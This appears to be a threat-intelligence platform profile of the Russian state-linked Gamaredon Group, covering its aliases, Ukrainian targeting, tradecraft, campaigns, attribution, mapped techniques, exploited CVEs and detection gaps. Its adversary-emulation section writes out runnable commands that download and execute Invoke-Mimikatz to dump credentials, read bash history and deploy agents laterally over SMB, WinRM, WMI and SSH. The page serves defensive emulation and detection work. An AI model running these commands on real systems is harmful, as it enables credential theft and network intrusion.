Home/Threat Actor/Gamaredon Group
Threat Actor

Gamaredon Group

gamaredon · russia · active since 2013-06

Gamaredon Group (IRON TILDEN / Primitive Bear / ACTINIUM / Armageddon / Shuckworm / DEV-0157 / Aqua Blizzard / NastyShrew / BlueAlpha / Trident Ursa / UAC-0010 / G0047) is a Russian state-sponsored cyber-espionage actor formally attributed to the Russian Federal Security Service (FSB) Center 18 (Information Security Center) operating from FSB facilities in occupied Crimea and Sevastopol.

active since June 2013, only months before the Russian annexation of Crimea, Gamaredon is the longest-running and highest-tempo Russian state-actor cluster focused exclusively on Ukrainian targets and represents the FSB's primary Ukraine-collection capability, operating in parallel with GRU clusters (Sandworm, APT28) and SVR (APT29); the November 4, 2021 Ukrainian SSU formal public attribution named specific FSB officers operating from the 4th Section of the SCO, FSB Department in occupied Crimea and Sevastopol, among the most comprehensive public attributions of a Russian-state cyber operator to a specific FSB unit and named officers.

targeting is overwhelmingly concentrated on Ukrainian government, military, intelligence services, law enforcement, judiciary, emergency services, energy and critical infrastructure, NGOs and humanitarian-aid organizations, universities, media, journalists, and opposition political parties.

tradecraft hallmarks include extreme high-tempo spear-phishing operations with Pterodo (Pteranodon) backdoor attachments, RTF template injection (T1221, Proofpoint December 2021 documented Gamaredon as the technique innovator subsequently copied broadly), the long-running Pterodo / Pteranodon implant family with continuous variant evolution, PowerPunch PowerShell loader, QuietSieve info stealer, the broader GammaSteel/GammaDrop/GammaLoad/GiDDome/DinoTrain implant family, PteroLNK USB-worm propagation for air-gapped Ukrainian government networks, Cloudflare CDN abuse for C2 (Recorded Future BlueAlpha tracking), fast-flux DNS infrastructure (Silent Push September 2023, 71-IP infrastructure), Telegram C2 channels, coordination with the stealthier InvisiMole cluster for access handoff on select high-value targets (ESET multi-year tracking), and a Microsoft-naming-convention 'volume over stealth' approach prioritizing broad sustained targeting over single-target stealth.

the October 2021 - February 2022 pre-invasion targeting surge against Ukrainian emergency-response and humanitarian-aid organizations (Microsoft MSTIC February 2022) and sustained operational tempo through and after the February 2022 Russian invasion demonstrate Gamaredon's role as the strategic-intelligence-collection arm of Russian wartime cyber operations.

russia confidence: high 42 aliases MITRE ATT&CK G0047 ↗
Sigma rules201 YARA rules61 Live IOCs27 CVEs exploited8

Profile

Gamaredon Group (IRON TILDEN / Primitive Bear / ACTINIUM / Armageddon / Shuckworm / DEV-0157 / Aqua Blizzard / NastyShrew / BlueAlpha / Blue Otso / Dancing Salome / Trident Ursa / UAC-0010 / UNC530 / Winterflounder / G0047) is a Russian state- sponsored cyber-espionage actor formally attributed to the Russian Federal Security Service (FSB) Center 18 (Information Security Center) operating from FSB facilities in occupied Crimea and Sevastopol. Active since June 2013, only months before the Russian annexation of the Crimean Peninsula in March 2014, Gamaredon is the longest-running and highest-tempo Russian state-actor cluster focused exclusively on Ukrainian targets and represents the FSB's primary Ukraine-collection capability, operating in parallel with GRU clusters (Sandworm, APT28) and SVR (APT29). The November 4, 2021 Ukrainian Security Service (SSU) formal public attribution named specific FSB officers operating from the 4th Section of the SCO, FSB Department in occupied Crimea and Sevastopol, among the most comprehensive public attributions of a Russian-state cyber operator to a specific FSB unit and named officers. The April 2022 Five Eyes joint cybersecurity advisory acknowledged industry-identified FSB links. SSU has also tied operations to FSB Center 16 (electronic and signals intelligence). Gamaredon's near- exclusive Ukraine focus has resulted in vastly more public operational data than any other Russian state cluster, Ukrainian authorities and Ukraine-focused vendors have published more Gamaredon TTPs, IOCs, and named-operator information than for any other comparable cluster. Targeting is overwhelmingly concentrated on Ukrainian government (cabinet ministries, presidential administration, foreign ministry), military (Armed Forces of Ukraine, territorial defense forces), intelligence services (SBU), law enforcement (police, prosecutor's offices), judiciary, emergency services, energy and critical infrastructure operators, NGOs and humanitarian-aid organizations, universities, media organizations, journalists, and opposition political parties. Secondary targeting includes Western diplomatic missions and government entities operating in Ukraine, with limited expansion to broader Eastern European and Baltic targets aligned with FSB regional interests. Tradecraft hallmarks distinguish Gamaredon as the noisy-but- effective Russian state-actor cluster: (a) extreme high-tempo operations, spear-phishing waves with Pterodo (Pteranodon) backdoor attachments and Office-template injection sent to tens of thousands of Ukrainian targets monthly.

(b) sustained use of weaponized Office documents (RTF template injection T1221, Proofpoint December 2021 documented Gamaredon as the innovator subsequently copied broadly across APT and criminal ecosystems)

(c) the Pterodo / Pteranodon implant family, Gamaredon's signature long-running custom backdoor with continuous variant evolution.

(d) PowerPunch PowerShell loader.

(e) QuietSieve info stealer.

(f) GammaSteel, GammaDrop, GammaLoad, GiDDome, DinoTrain, DesertDown, DilongTrash, ObfuBerry, ObfuMerry as the broader implant family; (g) PteroLNK USB-worm propagation (T1091) for lateral movement across air-gapped Ukrainian government networks; (h) GammaDrop and PteroSand secondary stagers; (i) Cloudflare CDN abuse for C2 (Recorded Future BlueAlpha tracking)

(j) fast-flux DNS infrastructure (Silent Push September 2023, 71-IP infrastructure with significant ASN/IP diversity)

(k) Telegram-based C2 channels; (l) coordination with the stealthier InvisiMole cluster for access-handoff on select high-value targets (ESET multi-year tracking)

(m) commodity-tool abuse including Remcos (Cisco Talos March 2025)

(n) Microsoft-naming-convention 'volume over stealth' approach, Gamaredon prioritizes broad, sustained targeting over single-target stealth.

The October 2021
  • February 2022 pre-invasion targeting surge against Ukrainian emergency-response and humanitarian-aid coordination organizations (Microsoft MSTIC February 2022) and the sustained operational tempo through the February 2022 Russian invasion and beyond demonstrate Gamaredon's role as a strategic-intelligence-collection arm of Russian wartime cyber operations. While Gamaredon itself does not conduct destructive operations (WhisperGate and HermeticWiper were attributed to GRU Sandworm subclusters), its persistent-access establishment likely supports broader Russian intelligence- requirement and target-list maintenance for destructive operators when access handoff is operationally appropriate.

Aliases

42
gamaredongamaredon groupiron tildeniron_tildenprimitive bearprimitive_bearactiniumarmageddonarmagedonshuckwormdev-0157dev_0157aqua blizzardaqua_blizzardnastyshrewnasty shrewbluealphablue alphablue otsoblue_otsodancing salomedancing_salometrident ursatrident_ursauac-0010uac_0010unc530unc 530winterflounderwinter_flounderwinterflouderfsbfsb center 18fsb 18th centerfsb information security centerfsb center 16fsb 16th center4th section scofsb crimeafsb sevastopolrussian federal security serviceg0047

Adversary Emulation Plan

13 steps
Runnable Caldera emulation profile Worm - Move laterally any way possible. Ordered along the attack lifecycle; each step maps to an ATT&CK technique with a concrete executor command. For authorized red-team / purple-team exercises only.
0 collection T1005 · Data from Local System darwin, linux
Parse SSH config
pip install stormssh && storm list
1 credential-access T1552.003 · Unsecured Credentials: Bash History darwin, linux
Dump history
find ~/.bash_sessions -name '*' -exec cat {} \; 2>/dev/null
2 discovery T1135 · Network Share Discovery windows
View admin shares
Get-SmbShare | ConvertTo-Json
3 discovery T1018 · Remote System Discovery darwin, linux, windows
Collect ARP details
arp -a
4 credential-access T1003.001 · OS Credential Dumping: LSASS Memory windows
Run PowerKatz
[System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $True };
$web = (New-Object System.Net.WebClient);
$result = $web.DownloadString("https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/4c7a2016fc7931cd37273c5d8e17b16d959867b3/Exfiltration/Invoke-Mimikatz.ps1");
iex $result; Invoke-Mimikatz -DumpCreds
5 discovery T1018 · Remote System Discovery windows
Find Hostname
nbtstat -A #{remote.host.ip}
6 discovery T1018 · Remote System Discovery windows
Reverse nslookup IP
nslookup #{remote.host.ip}
7 lateral-movement T1021.002 · Remote Services: SMB/Windows Admin Shares windows
Mount Share
net use \\#{remote.host.fqdn}\C$ /user:#{domain.user.name} #{domain.user.password}
8 lateral-movement T1021.002 · Remote Services: SMB/Windows Admin Shares windows
Copy 54ndc47 (SMB)
$path = "sandcat.go-windows";
$drive = "\\#{remote.host.fqdn}\C$";
Copy-Item -v -Path $path -Destination $drive"\Users\Public\s4ndc4t.exe";
9 lateral-movement T1570 · Lateral Tool Transfer windows, darwin, linux
Copy 54ndc47 (WinRM and SCP)
$job = Start-Job -ScriptBlock {
  $username = "#{domain.user.name}";
  $password = "#{domain.user.password}";
  $secstr = New-Object -TypeName System.Security.SecureString;
  $password.ToCharArray() | ForEach-Object {$secstr.AppendChar($_)};
  $cred = New-Object -Typename System.Management.Automation.PSCredential -Argumentlist $username, $secstr;
  $session = New-PSSession -ComputerName "#{remote.host.name}" -Credential $cred;
  $location = "#{location}";
  $exe = "#{exe_name}";
  Copy-Item $location -Destination "C:\Users\Public\svchost.exe" -ToSession $session;
  Start-Sleep -s 5;
  Remove-PSSession -Session $session;
};
Receive-Job -Job $job -Wait;
10 execution T1047 · Windows Management Instrumentation windows
Start 54ndc47 (WMI)
$node = '''#{remote.host.fqdn}''';
$user = '''#{domain.user.name}''';
$password = '''#{domain.user.password}''';
wmic /node:$node /user:$user /password:$password process call create "powershell.exe C:\Users\Public\s4ndc4t.exe -server #{server} -group #{group}";
11 lateral-movement T1021.006 · Remote Services: Windows Remote Management windows
Start Agent (WinRM)
$username = "#{domain.user.name}";
$password = "#{domain.user.password}";
$secstr = New-Object -TypeName System.Security.SecureString;
$password.ToCharArray() | ForEach-Object {$secstr.AppendChar($_)};
$cred = New-Object -Typename System.Management.Automation.PSCredential -Argumentlist $username, $secstr;
$session = New-PSSession -ComputerName #{remote.host.name} -Credential $cred;
Invoke-Command -Session $session -ScriptBlock{start-job -scriptblock{cmd.exe /c start C:\Users\Public\svchost.exe -server #{server} }};
Start-Sleep -s 5;
Remove-PSSession -Session $session;
12 lateral-movement T1021.004 · Remote Services: SSH darwin, linux
Start 54ndc47
scp -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -o ConnectTimeout=3 sandcat.go-darwin #{remote.ssh.cmd}:~/sandcat.go &&
ssh -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -o ConnectTimeout=3 #{remote.ssh.cmd} 'nohup ./sandcat.go -server #{server} -group red 1>/dev/null 2>/dev/null &'

Notable Campaigns

14
2025LNK Files Distributing Remcos Backdoor (Cisco Talos March 2025)
2024-2026Sustained War-Period Operations (2024-2026)
2024ESET Comprehensive Toolset Analysis (September 2024)
2023Fast-Flux Infrastructure Discovery (Silent Push September 2023)
2022Trident Ursa Invasion-Period Operations (Unit 42 February-December 2022)
2021-2022Pre-Invasion Targeting Surge (October 2021 - February 2022)
2021Novel RTF Template Injection Technique (Proofpoint December 2021)
2021SSU Formal FSB Center 18 Attribution (November 4, 2021)
2020Gamaredon Group Grows Its Game (ESET June 2020)
2020COVID-Themed Lure Campaigns (April-May 2020)
2018-2025InvisiMole Target Handoff Pattern (ESET multi-year)
2018Ukrainian SSU First Public FSB Attribution (November 2018)
2017Pteranodon Toolset Evolution Disclosure (Unit 42 February 2017)
2015LookingGlass Operation Armageddon Initial Disclosure (April 2015)

Attribution & Reporting

Attributed by
Ukrainian Security Service (SSU)Ukrainian CERT-UAState Service of Special Communications and Information Protection of UkraineFBICISANSAUS Cyber CommandUK NCSCAustralia ACSCCanadian Centre for Cyber SecurityNew Zealand NCSCFive EyesEstonia CERT-EEMicrosoftMicrosoft Threat Intelligence Center (MSTIC)MandiantFireEyeGoogle Cloud Threat IntelligenceCrowdStrikeKaspersky GReATESETSymantec / BroadcomTrend MicroSentinelOnePalo Alto Networks Unit 42Cisco TalosRecorded FutureInsikt GroupSecureWorksCheck Point ResearchProofpointVolexityLookingGlassSilent PushHunt.ioCloudflare
Key reporting
reportUkrainian Security Service (SSU): Technical Report on Armageddon Group Operations (November 2021)
reportUkrainian CERT-UA: UAC-0010 Threat Tracking (multiple)
reportMicrosoft Threat Intelligence Center: ACTINIUM Targets Ukrainian Organizations (February 4, 2022)
reportPalo Alto Networks Unit 42: Russia's Gamaredon aka Primitive Bear APT Group Actively Targeting Ukraine (February 3, 2022)
reportPalo Alto Networks Unit 42: Trident Ursa Cyber Conflict Operations Unwavering Since Invasion of Ukraine (December 20, 2022)
reportESET: Gamaredon Group Grows Its Game (June 11, 2020)
reportESET: Cyberespionage the Gamaredon Way, Analysis of Toolset Used to Spy on Ukraine in 2022 and 2023 (September 26, 2024)
reportSymantec Threat Hunter Team: Shuckworm Continues Cyber-Espionage Attacks Against Ukraine (multiple, 2022-2025)
reportCisco Talos: Gamaredon Campaign Abuses LNK Files to Distribute Remcos Backdoor (March 28, 2025)
reportCisco Talos: Network Footprints of Gamaredon Group (2022)
reportProofpoint: Injection is the New Black, Novel RTF Template Inject Technique (December 1, 2021)
reportLookingGlass: Operation Armageddon, Cyber Espionage as a Strategic Component of Russian Modern Warfare (April 2015)
reportSilent Push: From Russia with a 71, Uncovering Gamaredon's Fast Flux Infrastructure (September 7, 2023)
reportHunt.io: State-Sponsored Tactics, How Gamaredon and ShadowPad Operate and Rotate Their Infrastructure (April 8, 2025)
reportCloudflare: 2026 Cloudflare Threat Report (March 3, 2026)
reportKaspersky GReAT: Gamaredon Deploys Pterodo Against Ukraine
reportRecorded Future: BlueAlpha Network Infrastructure (Cloudflare CDN Abuse)
reportCERT-EE (Estonia): Gamaredon Infection, From Dropper to Entry (January 2021)
reportFive Eyes Joint Cybersecurity Advisory: Russian State-Sponsored and Criminal Cyber Threats to Critical Infrastructure (April 20, 2022)
reportCrowdStrike: Adversary Profile, PRIMITIVE BEAR
reportSecureWorks: IRON TILDEN Threat Group Profile
reportSOCRadar: Dark Web Profile, Gamaredon APT
reportEuRepoC: APT Profile, Gamaredon Group
reportCouncil on Foreign Relations: Gamaredon Cyber Operations Tracker

Operational

State sponsor

Russian Federation, Federal Security Service (FSB) Center 18 (Information Security Center), operating from FSB facilities in occupied Crimea and Sevastopol. The November 4, 2021 Ukrainian Security Service (SSU) public attribution named specific FSB officers and tied operations to the 4th Section of the SCO, FSB Department in occupied Crimea and Sevastopol. SSU has also tied operations to FSB Center 16 (electronic and signals intelligence).

The April 2022 Five Eyes joint cybersecurity advisory acknowledged industry-identified FSB links. Active since at least June 2013, only months before the Russian annexation of the Crimean Peninsula.

Motivations
espionage, intelligence_gathering, geopolitical_collection, ukraine_focused_intelligence, military_intelligence, government_intelligence, tactical_battlefield_intelligence, crimea_aligned_operations, regional_dominance, opportunistic_disruption, access_handoff_to_other_clusters, sabotage
Sectors
governmentukrainian_governmentmilitaryukrainian_militaryarmed_forcesterritorial_defenseforeign_ministriesintelligence_agenciessecurity_serviceslaw_enforcementpolicejudiciarycourtsprosecutor_officesemergency_servicesemergency_responsecritical_infrastructureenergyutilitiestelecommunicationsnon_governmental_organizationsngoshumanitarian_aid_organizationsnon_profitshigher_educationacademiaresearch_institutesmediajournaliststhink_tanksopposition_political_partiesreligious_organizationsorthodox_churchwestern_embassieswestern_diplomatic_in_ukraine
Regions
ukrainecrimeadonbasrussiabelarusmoldovageorgiaarmeniakazakhstanlatvialithuaniaestoniapolandczech_republicgermanyunited_statesunited_kingdomcanadabulgariaromaniaeuropeeastern_europebaltic_states

Techniques Used

60
T1003T1003.001T1003.002T1005T1008T1010T1012T1016T1018T1021T1021.001T1021.002T1025T1027T1027.001T1027.002T1027.010T1027.013T1029T1033T1036T1036.005T1041T1047T1048T1048.003T1049T1053T1053.005T1055T1055.001T1056T1056.001T1057T1059T1059.001T1059.003T1059.005T1059.007T1068T1069T1070T1070.004T1071T1071.001T1071.003T1074T1074.001T1078T1078.002T1078.003T1078.004T1082T1083T1087T1090T1090.001T1090.002T1091T1095

Detection Blind Spots

60 techniques
Across this actor’s 60 mapped techniques, the share covered by each detection layer. Low bars are where you’d be blind if this actor targeted you.
Behavioral / log (Sigma)56/60 · 93%
Analytics (MITRE CAR)33/60 · 55%
Runtime / container (Falco)4/60 · 6%
File / malware (YARA)0/60 · 0%
Network (Suricata/Snort)14/60 · 23%
Vuln scan (Nuclei)0/60 · 0%

Atomic Test Plan

30 techniques
Runnable Atomic Red Team tests covering this actor’s mapped techniques - validate your detections against this specific adversary. Cross-reference the blind spots above. For authorized lab / purple-team use. Open the full builder

Tools Used

12 mapped
S0002 · MimikatzS0029 · PsExecS0039 · NetS0057 · TasklistS0075 · RegS0096 · SysteminfoS0147 · PteranodonS0160 · certutilS0190 · BITSAdminS0349 · LaZagneS1063 · Brute Ratel C4S1068 · BlackCat
Other tooling / TTPs (curation, not ATT&CK-mapped):
METERPRETER

CVEs Exploited

8
CVECVE-2017-0199
CVECVE-2017-11882
CVECVE-2017-8570
CVECVE-2018-0802
CVECVE-2018-15982
CVECVE-2021-40444
CVECVE-2022-30190
CVECVE-2023-23397
Intelligence Graph · click any node to traverse
CVETechnique ActorTool Family
drag to reposition · click any node to traverse · button top-right enlarges
External lookups - second-class, for what we don’t hold ourselves
MITRE ATT&CKMITRE searchMalpediaGoogle
Vulnerabilities
CISA KEV catalog
CWE weaknesses
CAPEC attack patterns
Package vulnerabilities
Threat intelligence
Threat actors
Tools & malware
ATT&CK techniques
IOCs
Detection & defense
Sigma rules
YARA rules
Atomic Red Team tests
D3FEND countermeasures
Compliance
NIST 800-53
ISO 27001:2022
SOC 2 TSC
PCI-DSS v4.0
CIS Controls v8.1
About
All capabilities
Live statistics
Data sources
Privacy policy
Terms of service
threatengine.sh  ·  Open-source threat intelligence platform  ·  100+ authoritative sources  ·  Every fact traces to its origin